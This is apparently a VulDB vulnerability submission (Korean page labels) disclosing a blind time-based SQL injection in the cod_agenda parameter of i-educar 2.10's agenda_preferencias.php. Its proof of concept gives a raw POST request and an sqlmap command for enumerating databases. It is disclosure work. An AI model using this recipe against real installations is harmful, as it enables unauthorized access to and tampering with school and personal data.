| 제목 | Portabilis i-educar 2.10 SQL Injection |
|---|
| 설명 | # SQL Injection (Blind Time-Based) Vulnerability in cod_agenda Parameter on agenda_preferencias.php Endpoint
---
## Summary
A SQL Injection vulnerability was identified in the `agenda_preferencias.php` endpoint of the _i-educar_ application, specifically in the `cod_agenda` parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data.
---
## Details
**Vulnerable Endpoint:** `/agenda_preferencias.php`
**Parameter:** `cod_agenda`
The application fails to properly validate and sanitize user input in the `cod_agenda` parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays.
---
## PoC
Save the request in req.txt file:
```
POST /intranet/agenda_preferencias.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/intranet/agenda_preferencias.php
Cookie: [COOKIE]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
tipoacao=Editar&cod_agenda=2&envia_alerta=0&agenda_display=2
```
Then use sqlmap:
`sqlmap -r req.txt --risk=3 --level=5 --dbs --dbms=PostgreSQL --batch `
![[Pasted image 20250816232357.png]]
## Impact
- **Unauthorized data access:** Retrieving sensitive information such as credentials, personal data, or configuration details
- **Database enumeration:** Extracting schema names, tables, and column structures
- **Data manipulation:** Inserting, updating, or deleting database records
- **Denial of Service (DoS):** Using time-based injections to disrupt application availability
- **Potential privilege escalation or RCE:** Depending on the database configuration and functions available
This vulnerability can lead to full compromise of the database and expose sensitive application and user data. |
|---|
| 원천 | ⚠️ https://github.com/marcelomulder/CVE/blob/main/i-educar/SQL%20Injection%20(Blind%20Time-Based)%20Vulnerability%20in%20cod_agenda%20Parameter%20on%20agenda_preferencias.php%20Endpoint.md |
|---|
| 사용자 | marceloQz (UID 87549) |
|---|
| 제출 | 2025. 08. 17. PM 11:11 (8 개월 ago) |
|---|
| 모더레이션 | 2025. 08. 28. PM 05:28 (11 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 321784 [Portabilis i-Educar 까지 2.10 agenda_preferencias.php cod_agenda SQL 주입] |
|---|
| 포인트들 | 20 |
|---|